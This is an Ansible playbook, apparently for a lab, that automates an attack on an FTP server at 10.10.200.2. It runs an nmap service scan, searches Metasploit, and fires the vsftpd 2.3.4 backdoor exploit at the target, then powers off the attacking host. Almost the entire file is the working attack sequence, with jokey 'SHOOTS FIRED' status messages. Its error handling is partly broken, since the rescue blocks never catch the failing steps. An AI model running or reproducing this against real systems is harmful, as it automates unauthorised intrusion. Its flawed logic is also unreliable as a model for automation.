---
- name: BASIC FTP ATTACK
  hosts: thx_kali
  become: yes
  gather_facts: no
  tasks:
    - name: CHECKING SERVICE STATUS
      shell: nmap -sV -p21 -sC -A 10.10.200.2
      register: result1
      ignore_errors: yes

    - name: Process CHECKING SERVICE STATUS
      block:
        - name: SUCCESS 1
          debug:
            msg: "ITS OPEN LETS GO MAN: {{ result1.stdout }}"
      rescue:
        - name: HALT CHECKING SERVICE STATUS
          debug:
            msg: "OKAY !! NO WAY: {{ result1.stderr }}"
        - name: STOPPED
          fail:
            msg: "Stopping playbook due to command 1 failure."

    - name: STARTING METASPLOIT CONSOLE
      shell: msfconsole -q -x 'exit'
      register: result2
      ignore_errors: yes

    - name: Process STARTING METASPLOIT CONSOLE
      block:
        - name: SUCCESS 2
          debug:
            msg: "ITS STARTED LETS GO MAN: {{ result2.stdout }}"
      rescue:
        - name: HALT METASPLOIT CONSOLE
          debug:
            msg: "OKAY !! NO WAY: {{ result2.stderr }}"

    - name: SEARCH VSFTP EXPLOIT
      shell: msfconsole -q -x 'search vsftp; exit'
      register: result3
      ignore_errors: yes

    - name: Process SEARCH VSFTP EXPLOIT
      block:
        - name: SUCCESS 3
          debug:
            msg: "GUNS ARE HERE LETS GO MAN: {{ result3.stdout }}"
      rescue:
        - name: HALT VSFTP EXPLOIT SEARCH
          debug:
            msg: "OKAY !! NO WAY: {{ result3.stderr }}"

    - name: SELECT EXPLOIT
      shell: msfconsole -q -x 'use exploit/unix/ftp/vsftpd_234_backdoor; exit'
      register: result4
      ignore_errors: yes

    - name: Process SELECT EXPLOIT
      block:
        - name: SUCCESS 4
          debug:
            msg: "BULLET IN LETS GO MAN: {{ result4.stdout }}"
      rescue:
        - name: HALT SELECT EXPLOIT
          debug:
            msg: "OKAY !! NO WAY: {{ result4.stderr }}"

    - name: SET RHOST
      shell: msfconsole -q -x 'use exploit/unix/ftp/vsftpd_234_backdoor; set RHOST 10.10.200.2; exit'
      register: result5
      ignore_errors: yes

    - name: Process SET RHOST
      block:
        - name: SUCCESS 5
          debug:
            msg: "IN TARGET LETS GO MAN: {{ result5.stdout }}"
      rescue:
        - name: HALT SET RHOST
          debug:
            msg: "OKAY !! NO WAY: {{ result5.stderr }}"

    - name: RUN EXPLOIT
      shell: msfconsole -q -x 'use exploit/unix/ftp/vsftpd_234_backdoor; set RHOST 10.10.200.2; run; exit'
      register: result6
      ignore_errors: yes

    - name: Process RUN EXPLOIT
      block:
        - name: SUCCESS 6
          debug:
            msg: "SHOOTS FIRED LETS GO MAN: {{ result6.stdout }}"
      rescue:
        - name: HALT RUN EXPLOIT
          debug:
            msg: "OKAY !! NO WAY: {{ result6.stderr }}"

    - name: SHUTDOWN SYSTEM
      shell: poweroff
      register: result7
      ignore_errors: yes

    - name: Process SHUTDOWN SYSTEM
      block:
        - name: SUCCESS 7
          debug:
            msg: "SYSTEM SHUTDOWN: {{ result7.stdout }}"
      rescue:
        - name: HALT SHUTDOWN SYSTEM
          debug:
            msg: "OKAY !! NO WAY: {{ result7.stderr }}"
